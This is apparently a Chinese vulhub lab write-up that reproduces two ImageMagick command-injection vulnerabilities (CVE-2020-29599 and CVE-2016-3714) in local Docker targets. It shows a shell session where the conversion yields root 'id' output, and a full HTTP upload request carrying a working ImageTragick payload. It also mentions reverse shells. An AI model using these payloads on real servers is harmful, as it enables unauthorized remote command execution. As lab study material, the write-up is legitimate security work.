vulhub漏洞复现27

vulhub漏洞复现27

一、 CVE-2020-29599_Imagemagick PDF密码位置命令注入漏洞

前言

ImageMagick是一款使用量很广的图片处理程序，很多厂商都调用了这个程序进行图片处理，包括图片的伸缩、切割、水印、格式转换等等。研究者@insertscript 发现在Imagemagick 7.0.10-35到7.0.10-40、6.9.11-35 up到6.9.11-40处理PDF的过程中存在一处命令注入漏洞，通过构造好的SVG格式图片文件，即可在Imagemagick中注入任意命令。

漏洞环境

直接执行如下命令进入安装了Imagemagick 7.0.10-36的Linux环境：

靶场：192.168.4.10_ubuntu

#docker-compose run im bash

 

漏洞利用

进入`/tmp`目录，对[poc.svg](poc.svg)进行格式转换，即可触发漏洞：

```

docker-compose  run im bash

root@9ef208fdf1b3:~# cd /tmp/

root@9ef208fdf1b3:/tmp# ls

poc.svg

root@9ef208fdf1b3:/tmp# identify poc.svg

poc.svg SVG 700x700 700x700+0+0 16-bit sRGB 398B 0.000u 0:00.002

root@9ef208fdf1b3:/tmp# convert poc.svg poc.png

sh: 1: : Permission denied

convert: MagickCore/image.c:1168: DestroyImage: Assertion `image != (Image *) NULL' failed.

Aborted (core dumped)

root@9ef208fdf1b3:/tmp# ls

0wned  poc.svg

root@9ef208fdf1b3:/tmp# cat 0wned

uid=0(root) gid=0(root) groups=0(root)

```

此时命令`echo $(id)> ./0wned`已执行成功：

 

二、 CVE-2016–3714_Imagetragick 命令执行漏洞

漏洞原理

近来有研究者发现，当用户传入一个包含『畸形内容』的图片的时候，就有可能触发命令注入漏洞。

漏洞环境

执行如下命令启动一个包含了Imagemagick 6.9.2-10的PHP服务器：

#docker-compose up -d

漏洞复现

访问`http://your-ip:8080/`即可查看到一个上传组件。

 

发送如下数据包：

```

POST / HTTP/1.1

Host:192.168.4.10:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

Connection: close

Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymdcbmdQR1sDse9Et

Content-Length: 328

------WebKitFormBoundarymdcbmdQR1sDse9Et

Content-Disposition: form-data; name="file_upload"; filename="1.gif"

Content-Type: image/png

push graphic-context

viewbox 0 0 640 480

fill 'url(https://127.0.0.0/oops.jpg"||id")'

pop graphic-context

------WebKitFormBoundarymdcbmdQR1sDse9Et--

```

成功执行

 

#同理该漏洞可利用反dshell